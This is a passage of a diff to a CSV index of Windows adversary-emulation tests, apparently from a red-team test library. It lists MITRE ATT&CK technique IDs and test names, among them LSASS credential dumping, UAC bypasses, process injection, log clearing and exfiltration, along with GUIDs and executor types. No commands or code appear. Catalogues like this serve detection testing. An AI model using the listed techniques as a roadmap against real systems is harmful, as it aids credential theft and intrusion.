unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt +credential-access,T1555,Credentials from Password Stores,1,Extract Windows Credential Manager via VBA,234f9b7c-b53d-4f32-897b-b880a6c9ea7b,powershell +credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell +credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt +credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt +credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt +credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell +credential-access,T1552.006,Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt +credential-access,T1552.006,Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell +credential-access,T1558.003,Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell +credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell +credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt +credential-access,T1003.001,LSASS Memory,1,Windows Credential Editor,0f7c5301-6859-45ba-8b4d-1fac30fc31ed,command_prompt +credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using ProcDump,0be2230c-9ab3-4ac2-8826-3199b9a0ebf8,command_prompt +credential-access,T1003.001,LSASS Memory,3,Dump LSASS.exe Memory using comsvcs.dll,2536dee2-12fb-459a-8c37-971844fa73be,powershell +credential-access,T1003.001,LSASS Memory,4,Dump LSASS.exe Memory using direct system calls and API unhooking,7ae7102c-a099-45c8-b985-4c7a2d05790d,command_prompt +credential-access,T1003.001,LSASS Memory,5,Dump LSASS.exe Memory using Windows Task Manager,dea6c349-f1c6-44f3-87a1-1ed33a59a607,manual +credential-access,T1003.001,LSASS Memory,6,Offline Credential Theft With Mimikatz,453acf13-1dbd-47d7-b28a-172ce9228023,command_prompt +credential-access,T1003.001,LSASS Memory,7,LSASS read with pypykatz,c37bc535-5c62-4195-9cc3-0517673171d8,command_prompt +credential-access,T1003.003,NTDS,1,Create Volume Shadow Copy with vssadmin,dcebead7-6c28-4b4b-bf3c-79deb1b1fc7f,command_prompt +credential-access,T1003.003,NTDS,2,Copy NTDS.dit from Volume Shadow Copy,c6237146-9ea6-4711-85c9-c56d263a6b03,command_prompt +credential-access,T1003.003,NTDS,3,Dump Active Directory Database with NTDSUtil,2364e33d-ceab-4641-8468-bfb1d7cc2723,command_prompt +credential-access,T1003.003,NTDS,4,Create Volume Shadow Copy with WMI,224f7de0-8f0a-4a94-b5d8-989b036c86da,command_prompt +credential-access,T1003.003,NTDS,5,Create Volume Shadow Copy with Powershell,542bb97e-da53-436b-8e43-e0a7d31a6c24,powershell +credential-access,T1003.003,NTDS,6,Create Symlink to Volume Shadow Copy,21748c28-2793-4284-9e07-d6d028b66702,command_prompt +credential-access,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a0-24b4-493e-9590-c699f75723ca,command_prompt +credential-access,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt +credential-access,T1003,OS Credential Dumping,1,Powershell Mimikatz,66fb0bc1-3c3f-47e9-a298-550ecfefacbc,powershell +credential-access,T1003,OS Credential Dumping,2,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt +credential-access,T1003,OS Credential Dumping,3,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell +credential-access,T1110.002,Password Cracking,1,Password Cracking with Hashcat,6d27df5d-69d4-4c91-bc33-5983ffe91692,command_prompt +credential-access,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell +credential-access,T1110.001,Password Guessing,1,Brute Force Credentials,09480053-2f98-4854-be6e-71ae5f672224,command_prompt +credential-access,T1110.003,Password Spraying,1,Password Spray all Domain Users,90bc2e54-6c84-47a5-9439-0a2a92b4b175,command_prompt +credential-access,T1110.003,Password Spraying,2,Password Spray (DomainPasswordSpray),263ae743-515f-4786-ac7d-41ef3a0d4b2b,powershell +credential-access,T1552.004,Private Keys,1,Private Keys,520ce462-7ca7-441e-b5a5-f8347f632696,command_prompt +credential-access,T1003.002,Security Account Manager,1,"Registry dump of SAM, creds, and secrets",5c2571d0-1572-416d-9676-812e64ca9f44,command_prompt +credential-access,T1003.002,Security Account Manager,2,Registry parse with pypykatz,a96872b2-cbf3-46cf-8eb4-27e8c0e85263,command_prompt +credential-access,T1003.002,Security Account Manager,3,esentutl.exe SAM copy,a90c2f4d-6726-444e-99d2-a00cd7c20480,command_prompt +credential-access,T1003.002,Security Account Manager,4,PowerDump Registry dump of SAM for hashes and usernames,804f28fc-68fc-40da-b5a2-e9d0bce5c193,powershell +collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell +collection,T1560.001,Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt +collection,T1560.001,Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt +collection,T1560.001,Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt +collection,T1560.001,Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt +collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell +collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt +collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell +collection,T1119,Automated Collection,3,Recon information for export with PowerShell,c3f6d794-50dd-482f-b640-0384fbb7db26,powershell +collection,T1119,Automated Collection,4,Recon information for export with Command Prompt,aa1180e2-f329-4e1e-8625-2472ec0bfaf3,command_prompt +collection,T1115,Clipboard Data,1,Utilize Clipboard to store or execute commands from,0cd14633-58d4-4422-9ede-daa2c9474ae7,command_prompt +collection,T1115,Clipboard Data,2,Execute Commands from Clipboard using PowerShell,d6dc21af-bec9-4152-be86-326b6babd416,powershell +collection,T1115,Clipboard Data,4,Collect Clipboard Data via VBA,9c8d5a72-9c98-48d3-b9bf-da2cc43bdf52,powershell +collection,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell +collection,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell +collection,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell +collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell +collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell +collection,T1114.001,Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell +collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell privilege-escalation,T1546.008,Accessibility Features,1,Attaches Command Prompt as a Debugger to a List of Target Processes,3309f53e-b22b-4eb6-8fd2-a6cf58b355a9,powershell privilege-escalation,T1546.008,Accessibility Features,2,Replace binary of sticky keys,934e90cf-29ca-48b3-863c-411737ad44e3,command_prompt privilege-escalation,T1546.010,AppInit DLLs,1,Install AppInit Shim,a58d9386-3080-4242-ab5f-454c16503d18,command_prompt @@ -7,14 +69,14 @@ privilege-escalation,T1546.011,Application Shimming,2,New shim database files cr privilege-escalation,T1546.011,Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell privilege-escalation,T1055.004,Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt privilege-escalation,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt -privilege-escalation,T1548.002,Bypass User Access Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt -privilege-escalation,T1548.002,Bypass User Access Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell -privilege-escalation,T1548.002,Bypass User Access Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt -privilege-escalation,T1548.002,Bypass User Access Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell -privilege-escalation,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell -privilege-escalation,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt -privilege-escalation,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell -privilege-escalation,T1548.002,Bypass User Access Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt +privilege-escalation,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt +privilege-escalation,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell +privilege-escalation,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt +privilege-escalation,T1548.002,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell +privilege-escalation,T1548.002,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell +privilege-escalation,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt +privilege-escalation,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell +privilege-escalation,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt privilege-escalation,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell privilege-escalation,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell privilege-escalation,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell @@ -34,7 +96,9 @@ privilege-escalation,T1134.004,Parent PID Spoofing,5,Parent PID Spoofing - Spawn privilege-escalation,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt privilege-escalation,T1546.013,PowerShell Profile,1,Append malicious start-process cmdlet,090e5aa5-32b6-473b-a49b-21e843a56896,powershell privilege-escalation,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell +privilege-escalation,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell privilege-escalation,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell +privilege-escalation,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,1,Reg Key Run,e55be3fd-3521-4610-9d1a-e210e42dcf05,command_prompt privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,2,Reg Key RunOnce,554cbd88-cde1-4b56-8168-0be552eed9eb,command_prompt privilege-escalation,T1547.001,Registry Run Keys / Startup Folder,3,PowerShell Registry RunOnce,eb44f842-0457-4ddc-9b92-c4caa144ac42,powershell @@ -45,6 +109,7 @@ privilege-escalation,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fe privilege-escalation,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt privilege-escalation,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt privilege-escalation,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell +privilege-escalation,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell privilege-escalation,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt privilege-escalation,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell privilege-escalation,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell @@ -65,19 +130,21 @@ defense-evasion,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a1 defense-evasion,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell defense-evasion,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt defense-evasion,T1197,BITS Jobs,4,Bits download using destktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt -defense-evasion,T1548.002,Bypass User Access Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt -defense-evasion,T1548.002,Bypass User Access Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell -defense-evasion,T1548.002,Bypass User Access Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt -defense-evasion,T1548.002,Bypass User Access Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell -defense-evasion,T1548.002,Bypass User Access Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell -defense-evasion,T1548.002,Bypass User Access Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt -defense-evasion,T1548.002,Bypass User Access Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell -defense-evasion,T1548.002,Bypass User Access Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt +defense-evasion,T1548.002,Bypass User Account Control,1,Bypass UAC using Event Viewer (cmd),5073adf8-9a50-4bd9-b298-a9bd2ead8af9,command_prompt +defense-evasion,T1548.002,Bypass User Account Control,2,Bypass UAC using Event Viewer (PowerShell),a6ce9acf-842a-4af6-8f79-539be7608e2b,powershell +defense-evasion,T1548.002,Bypass User Account Control,3,Bypass UAC using Fodhelper,58f641ea-12e3-499a-b684-44dee46bd182,command_prompt +defense-evasion,T1548.002,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell,3f627297-6c38-4e7d-a278-fc2563eaaeaa,powershell +defense-evasion,T1548.002,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell),3c51abf2-44bf-42d8-9111-dc96ff66750f,powershell +defense-evasion,T1548.002,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories,f7a35090-6f7f-4f64-bb47-d657bf5b10c1,command_prompt +defense-evasion,T1548.002,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute,3be891eb-4608-4173-87e8-78b494c029b7,powershell +defense-evasion,T1548.002,Bypass User Account Control,8,Disable UAC using reg.exe,9e8af564-53ec-407e-aaa8-3cb20c3af7f9,command_prompt defense-evasion,T1218.003,CMSTP,1,CMSTP Executing Remote Scriptlet,34e63321-9683-496b-bbc1-7566bc55e624,command_prompt defense-evasion,T1218.003,CMSTP,2,CMSTP Executing UAC Bypass,748cb4f6-2fb3-4e97-b7ad-b22635a09ab0,command_prompt defense-evasion,T1574.012,COR_PROFILER,1,User scope COR_PROFILER,9d5f89dc-c3a5-4f8a-a4fc-a6ed02e7cb5a,powershell defense-evasion,T1574.012,COR_PROFILER,2,System Scope COR_PROFILER,f373b482-48c8-4ce4-85ed-d40c8b3f7310,powershell defense-evasion,T1574.012,COR_PROFILER,3,Registry-free process scope COR_PROFILER,79d57242-bbef-41db-b301-9d01d9f6e817,powershell +defense-evasion,T1070.003,Clear Command History,9,Prevent Powershell History Logging,2f898b81-3e97-4abb-bc3f-a95138988370,powershell +defense-evasion,T1070.003,Clear Command History,10,Clear Powershell History by Deleting History File,da75ae8d-26d6-4483-b0fe-700e4df4f037,powershell defense-evasion,T1070.001,Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt defense-evasion,T1070.001,Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLog,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell defense-evasion,T1027.004,Compile After Delivery,1,Compile After Delivery using csc.exe,ffcdbd6a-b0e8-487d-927a-09127fe9a206,command_prompt @@ -184,7 +251,9 @@ defense-evasion,T1550.003,Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf3 defense-evasion,T1556.002,Password Filter DLL,1,Install and Register Password Filter DLL,a7961770-beb5-4134-9674-83d7e1fa865c,powershell defense-evasion,T1574.009,Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt defense-evasion,T1055.012,Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell +defense-evasion,T1055.012,Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell defense-evasion,T1055,Process Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell +defense-evasion,T1055,Process Injection,2,Shellcode execution via VBA,1c91e740-1729-4329-b779-feba6e71d048,powershell defense-evasion,T1216.001,PubPrn,1,PubPrn.vbs Signed Script Bypass,9dd29a1f-1e16-4862-be83-913b10a88f6c,command_prompt defense-evasion,T1218.009,Regsvcs/Regasm,1,Regasm Uninstall Method Call Test,71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112,command_prompt defense-evasion,T1218.009,Regsvcs/Regasm,2,Regsvcs Uninstall Method Call Test,fd3c1c6a-02d2-4b72-82d9-71c527abb126,powershell @@ -215,6 +284,8 @@ defense-evasion,T1218,Signed Binary Proxy Execution,2,SyncAppvPublishingServer - defense-evasion,T1218,Signed Binary Proxy Execution,3,Register-CimProvider - Execute evil dll,ad2c17ed-f626-4061-b21e-b9804a6f3655,command_prompt defense-evasion,T1218,Signed Binary Proxy Execution,4,InfDefaultInstall.exe .inf Execution,54ad7d5a-a1b5-472c-b6c4-f8090fb2daef,command_prompt defense-evasion,T1218,Signed Binary Proxy Execution,5,ProtocolHandler.exe Downloaded a Suspicious File,db020456-125b-4c8b-a4a7-487df8afb5a2,command_prompt +defense-evasion,T1218,Signed Binary Proxy Execution,6,Microsoft.Workflow.Compiler.exe Payload Execution,7cbb0f26-a4c1-4f77-b180-a009aa05637e,powershell +defense-evasion,T1218,Signed Binary Proxy Execution,7,Renamed Microsoft.Workflow.Compiler.exe Payload Executions,4cc40fd7-87b8-4b16-b2d7-57534b86b911,powershell defense-evasion,T1216,Signed Script Proxy Execution,1,SyncAppvPublishingServer Signed Script PowerShell Command Execution,275d963d-3f36-476c-8bef-a2a3960ee6eb,command_prompt defense-evasion,T1216,Signed Script Proxy Execution,2,manage-bde.wsf Signed Script Command Execution,2a8f2d3c-3dec-4262-99dd-150cb2a4d63a,command_prompt defense-evasion,T1497.001,System Checks,2,Detect Virtualization Environment (Windows),502a7dc4-9d6f-4d28-abf2-f0e84692562d,powershell @@ -280,6 +351,7 @@ persistence,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db persistence,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt persistence,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt persistence,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell +persistence,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell persistence,T1546.002,Screensaver,1,Set Arbitrary Binary as Screensaver,281201e7-de41-4dc9-b73d-f288938cbb64,command_prompt persistence,T1547.005,Security Support Provider,1,Modify SSP configuration in registry,afdfd7e3-8a0b-409f-85f7-886fdf249c9e,powershell persistence,T1574.011,Services Registry Permissions Weakness,1,Service Registry Permissions Weakness,f7536d63-7fd4-466f-89da-7e48d550752a,powershell @@ -411,25 +483,6 @@ command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test o command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell command-and-control,T1071.001,Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell command-and-control,T1071.001,Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt -collection,T1560,Archive Collected Data,1,Compress Data for Exfiltration With PowerShell,41410c60-614d-4b9d-b66e-b0192dd9c597,powershell -collection,T1560.001,Archive via Utility,1,Compress Data for Exfiltration With Rar,02ea31cb-3b4c-4a2d-9bf1-e4e70ebcf5d0,command_prompt -collection,T1560.001,Archive via Utility,2,Compress Data and lock with password for Exfiltration with winrar,8dd61a55-44c6-43cc-af0c-8bdda276860c,command_prompt -collection,T1560.001,Archive via Utility,3,Compress Data and lock with password for Exfiltration with winzip,01df0353-d531-408d-a0c5-3161bf822134,command_prompt -collection,T1560.001,Archive via Utility,4,Compress Data and lock with password for Exfiltration with 7zip,d1334303-59cb-4a03-8313-b3e24d02c198,command_prompt -collection,T1123,Audio Capture,1,using device audio capture commandlet,9c3ad250-b185-4444-b5a9-d69218a10c95,powershell -collection,T1119,Automated Collection,1,Automated Collection Command Prompt,cb379146-53f1-43e0-b884-7ce2c635ff5b,command_prompt -collection,T1119,Automated Collection,2,Automated Collection PowerShell,634bd9b9-dc83-4229-b19f-7f83ba9ad313,powershell -collection,T1119,Automated Collection,3,Recon information for export with PowerShell,c3f6d794-50dd-482f-b640-0384fbb7db26,powershell -collection,T1119,Automated Collection,4,Recon information for export with Command Prompt,aa1180e2-f329-4e1e-8625-2472ec0bfaf3,command_prompt -collection,T1115,Clipboard Data,1,Utilize Clipboard to store or execute commands from,0cd14633-58d4-4422-9ede-daa2c9474ae7,command_prompt -collection,T1115,Clipboard Data,2,Execute Commands from Clipboard using PowerShell,d6dc21af-bec9-4152-be86-326b6babd416,powershell -collection,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell -collection,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell -collection,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell -collection,T1074.001,Local Data Staging,1,Stage data from Discovery.bat,107706a5-6f9f-451a-adae-bab8c667829f,powershell -collection,T1074.001,Local Data Staging,3,Zip a Folder with PowerShell for Staging in Temp,a57fbe4b-3440-452a-88a7-943531ac872a,powershell -collection,T1114.001,Local Email Collection,1,Email Collection with PowerShell Get-Inbox,3f1b5096-0139-4736-9b78-19bcb02bb1cb,powershell -collection,T1113,Screen Capture,5,Windows Screencapture,3c898f62-626c-47d5-aad2-6de873d69153,powershell execution,T1053.002,At (Windows),1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt execution,T1559.002,Dynamic Data Exchange,1,Execute Commands,f592ba2a-e9e8-4d62-a459-ef63abd819fd,manual execution,T1559.002,Dynamic Data Exchange,2,Execute PowerShell script via Word DDE,47c21fb6-085e-4b0d-b4d2-26d72c3830b3,command_prompt @@ -463,10 +516,12 @@ execution,T1053.005,Scheduled Task,1,Scheduled Task Startup Script,fec27f65-db86 execution,T1053.005,Scheduled Task,2,Scheduled task Local,42f53695-ad4a-4546-abb6-7d837f644a71,command_prompt execution,T1053.005,Scheduled Task,3,Scheduled task Remote,2e5eac3e-327b-4a88-a0c0-c4057039a8dd,command_prompt execution,T1053.005,Scheduled Task,4,Powershell Cmdlet Scheduled Task,af9fd58f-c4ac-4bf2-a9ba-224b71ff25fd,powershell +execution,T1053.005,Scheduled Task,5,Task Scheduler via VBA,ecd3fa21-7792-41a2-8726-2c5c673414d3,powershell execution,T1569.002,Service Execution,1,Execute a Command as a Service,2382dee2-a75f-49aa-9378-f52df6ed3fb1,command_prompt execution,T1569.002,Service Execution,2,Use PsExec to execute a command on a remote host,873106b7-cfed-454b-8680-fa9f6400431c,command_prompt execution,T1059.005,Visual Basic,1,Visual Basic script execution to gather local computer information,1620de42-160a-4fe5-bbaf-d3fef0181ce9,powershell execution,T1059.005,Visual Basic,2,Encoded VBS code execution,e8209d5f-e42d-45e6-9c2f-633ac4f1eefa,powershell +execution,T1059.005,Visual Basic,3,Extract Memory via VBA,8faff437-a114-4547-9a60-749652a03df6,powershell execution,T1059.003,Windows Command Shell,1,Create and Execute Batch Script,9e8894c0-50bd-4525-a96c-d4ac78ece388,powershell execution,T1047,Windows Management Instrumentation,1,WMI Reconnaissance Users,c107778c-dcf5-47c5-af2e-1d058a3df3ea,command_prompt execution,T1047,Windows Management Instrumentation,2,WMI Reconnaissance Processes,5750aa16-0e59-4410-8b9a-8a47ca2788e2,command_prompt @@ -476,47 +531,6 @@ execution,T1047,Windows Management Instrumentation,5,WMI Execute Local Process,b execution,T1047,Windows Management Instrumentation,6,WMI Execute Remote Process,9c8ef159-c666-472f-9874-90c8d60d136b,command_prompt exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell exfiltration,T1048.003,Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell -credential-access,T1056.004,Credential API Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages,de1934ea-1fbf-425b-8795-65fb27dd7e33,powershell -credential-access,T1552.001,Credentials In Files,3,Extracting passwords with findstr,0e56bf29-ff49-4ea5-9af4-3b81283fd513,powershell -credential-access,T1552.001,Credentials In Files,4,Access unattend.xml,367d4004-5fc0-446d-823f-960c74ae52c3,command_prompt -credential-access,T1555.003,Credentials from Web Browsers,1,Run Chrome-password Collector,8c05b133-d438-47ca-a630-19cc464c4622,powershell -credential-access,T1555.003,Credentials from Web Browsers,3,LaZagne - Credentials from Browser,9a2915b3-3954-4cce-8c76-00fbf4dbd014,command_prompt -credential-access,T1552.002,Credentials in Registry,1,Enumeration for Credentials in Registry,b6ec082c-7384-46b3-a111-9a9b8b14e5e7,command_prompt -credential-access,T1552.002,Credentials in Registry,2,Enumeration for PuTTY Credentials in Registry,af197fd7-e868-448e-9bd5-05d1bcd9d9e5,command_prompt -credential-access,T1056.002,GUI Input Capture,2,PowerShell - Prompt User for Password,2b162bfd-0928-4d4c-9ec3-4d9f88374b52,powershell -credential-access,T1552.006,Group Policy Preferences,1,GPP Passwords (findstr),870fe8fb-5e23-4f5f-b89d-dd7fe26f3b5f,command_prompt -credential-access,T1552.006,Group Policy Preferences,2,GPP Passwords (Get-GPPPassword),e9584f82-322c-474a-b831-940fd8b4455c,powershell -credential-access,T1558.003,Kerberoasting,1,Request for service tickets,3f987809-3681-43c8-bcd8-b3ff3a28533a,powershell -credential-access,T1056.001,Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell -credential-access,T1003.004,LSA Secrets,1,Dumping LSA Secrets,55295ab0-a703-433b-9ca4-ae13807de12f,command_prompt -credential-access,T1003.001,LSASS Memory,1,Windows Credential Editor,0f7c5301-6859-45ba-8b4d-1fac30fc31ed,command_prompt -credential-access,T1003.001,LSASS Memory,2,Dump LSASS.exe Memory using 